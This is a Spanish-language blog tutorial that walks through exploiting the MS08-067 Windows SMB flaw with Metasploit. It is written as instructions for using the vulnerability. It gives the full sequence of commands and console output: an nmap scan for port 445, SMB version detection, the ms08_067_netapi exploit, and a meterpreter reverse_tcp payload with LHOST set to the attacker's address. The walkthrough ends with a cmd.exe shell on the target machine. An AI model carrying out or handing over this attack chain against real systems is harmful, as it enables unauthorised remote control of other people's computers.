Microsoft Security Bulletin MS08-067
Esta guía se me ocurrió cuando hablaba sobre MSF con figuex y decidí hacerla, este error es muy común en los computadores con windows, apesar que la vulnerabilidad es de octubre del 2008 sigue siendo muy común. Veamos como sacar provecho de la vulnerabilidad:Podemos ver informacion con respecto a la vulnerabilidad en:
1. http://www.securityfocus.com/bid/31874/info
2. http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
Necesitamos el puerto 445/tcp abierto.
#nmap -v -sV 192.168.0.0/24 (buscamos en toda la red)
#nmap -v -sV 192.168.0.100 (objetivo especifico)
root@jhyx:~# nmap -v -sV 192.168.0.111
...snip...
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
79/tcp open finger?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
...snip...
Nos ubicamos dentro de metasploit y lo ejecutamos.
#cd msf/
#./msfconsole
Nos familiarizamos un poco con la interfaz,
msf > help
msf > show auxiliary
msf > show payloads
msf > show exploits
Verificamos la version de Windows, para saber si es vulnerable.
msf > search scanner
msf > use scanner/smb/version
msf > show OPTIONS (vemos las opciones disponibles)
msf > set RHOSTS 192.168.0.100 (configuramos el hosts remoto)
msf > run
msf > run
[*] 192.168.0.111 is running Windows XP Service Pack 2 (language: Spanish)
[*] Auxiliary module execution completed
Buscamos el exploit que vamos a usar.
msf > search ms08_67
Lo seleccionamos.
msf > use windows/smb/ms08_067_netapi
Y buscamos un payload (sirve para enviar el exploit).
msf > show payloads
Si sabemos cual usar, podemos buscar uno especifico:
msf > search meterpreter
Para usar el payload con nuestro exploit previamente seleccionado.
msf > set payload windows/meterpreter/reverse_tcp
Vemos las opciones y configuramos lo necesario.
msf > show OPTIONS
msf > set RHOST 192.168.0.100
msf > ser LHOST 192.168.0.145 (Aqui va la ip de nosotros)
Por ultimo lanzamos el exploit.
msf > exploit
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.145:4444 -> 192.168.0.100:3807)
Luego de haber ejecutado el payload meterpreter. Revisamos sus opciones:
meterpreter > help
Soliciamos acceso al shell del computador objetivo.
meterpreter > execute (Vemos las opciones)
meterpreter > execute -f cmd.exe -c
meterpreter > execute -f cmd.exe -c
Process 1960 created.
Channel 1 created.
Accedemos al canal creado.
meterpreter > interact (channel)
meterpreter > interact 1
Los comandos execute y interact permite al atacante acceder el computador objetivo a traves del command prompt.
Luego de esto estaremos en el shell del objetivo.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Ahora solo necesitas tener conocimientos y saber movernos a traves ms-dos.... Ya ese es otro tema.
Para salirnos de la ventana de ms-dos, "Ctrl+c".
Jhyx
0 comentarios:
Publicar un comentario